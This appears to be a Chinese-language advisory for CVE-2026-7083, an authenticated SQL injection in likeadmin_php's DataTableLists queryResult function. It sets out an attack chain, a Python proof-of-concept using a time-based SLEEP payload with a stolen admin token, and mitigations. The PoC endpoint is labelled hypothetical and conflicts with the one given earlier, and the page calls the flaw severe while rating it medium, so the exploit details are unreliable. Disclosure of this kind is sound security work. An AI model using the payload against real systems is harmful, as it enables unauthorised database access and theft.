CVE-2026-7083 likeadmin_php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-7083

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

likeadmin-likeshop likeadmin_php

漏洞概述

likeadmin-likeshop旗下的likeadmin_php组件在版本1.9.6及之前版本中存在严重的SQL注入漏洞。该漏洞位于后台管理API的数据表格处理文件`DataTableLists.php`的`queryResult`函数中。由于代码未对用户输入进行有效的安全过滤，导致经过身份验证的高权限攻击者可以构造恶意SQL语句并远程执行。尽管攻击需要高权限，但其利用难度低，可能导致数据库信息泄露、数据篡改及服务中断等风险。

技术细节

漏洞具体存在于 `likeadmin_php` 项目的后台管理API模块中，文件路径为 `server\app\adminapi\lists\tools\DataTableLists.php`。核心问题出在 `queryResult` 函数的处理逻辑上。该函数旨在根据前端传入的参数动态生成数据表格的查询语句。然而，在处理排序或搜索参数时，代码直接将用户可控的参数拼接到SQL查询字符串中，而没有使用PDO预处理机制或进行严格的类型转换。由于CVSS向量显示 `PR:H`，攻击者首先需要获取管理员权限。一旦拥有权限，攻击者可以通过向受影响端点发送特制的HTTP POST请求，注入恶意的SQL片段。利用方式包括基于布尔的盲注、时间盲注或联合查询注入。成功利用后，攻击者不仅能够读取数据库中的敏感信息，还可能通过写入操作进一步威胁服务器安全，造成机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别目标系统是否使用likeadmin_php框架，并确定其版本低于或等于1.9.6。

STEP 2

获取高权限凭证

由于CVSS要求PR:H（高权限），攻击者通过钓鱼、暴力破解或利用其他漏洞获取管理员后台账号和Token。

STEP 3

构造并发送恶意请求

攻击者利用获取的凭证，向`/adminapi/lists/tools/DataTableLists`接口发送特制的HTTP POST请求，在`order`或`search`等参数中注入SQL语句。

STEP 4

执行SQL注入攻击

服务器端的`queryResult`函数直接执行了拼接后的SQL语句，攻击者从而提取敏感数据（如用户信息、密码哈希）或破坏数据库完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target: likeadmin_php <= 1.9.6
# Description: PoC for SQL Injection in DataTableLists queryResult function
# Note: Requires Admin Credentials (PR:H)

def check_sqli(target_url, admin_cookie):
    headers = {
        "Cookie": f"admin_token={admin_cookie}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Hypothetical endpoint based on file path structure
    url = f"{target_url}/adminapi/tools.data_table/lists"
    
    # Payload testing for time-based blind injection
    # Injecting into a parameter likely handled by queryResult
    payload = {
        "page": 1,
        "limit": 10,
        "order_by": "id",
        "order": "IF(1=1,SLEEP(5),id)"  # Malicious SQL payload
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability Confirmed: Server response delayed (SQL Injection successful).")
        else:
            print("[-] Vulnerability not detected or payload invalid.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    token = "your_stolen_admin_token_here"
    check_sqli(target, token)

影响范围

likeadmin-likeshop likeadmin_php <= 1.9.6

防御指南

临时缓解措施

在官方补丁发布之前，建议严格限制后台管理接口（/adminapi/）的访问来源IP地址，仅允许内部网络或受信任的IP访问。同时，部署Web应用防火墙（WAF），针对`DataTableLists`相关接口配置规则，拦截包含常见SQL注入特征（如单引号、UNION、SELECT、SLEEP等）的请求流量，并加强管理员账户的密码复杂度与定期更换策略。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7083
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7083
3 Details https://www.cvedetails.com/cve/CVE-2026-7083/
4 VulDB https://vuldb.com/cve/CVE-2026-7083
5 Link https://github.com/likeadmin-likeshop/likeadmin_php/
6 Link https://github.com/likeadmin-likeshop/likeadmin_php/issues/8
7 Link https://vuldb.com/submit/799570
8 Link https://vuldb.com/vuln/359658
9 Link https://vuldb.com/vuln/359658/cti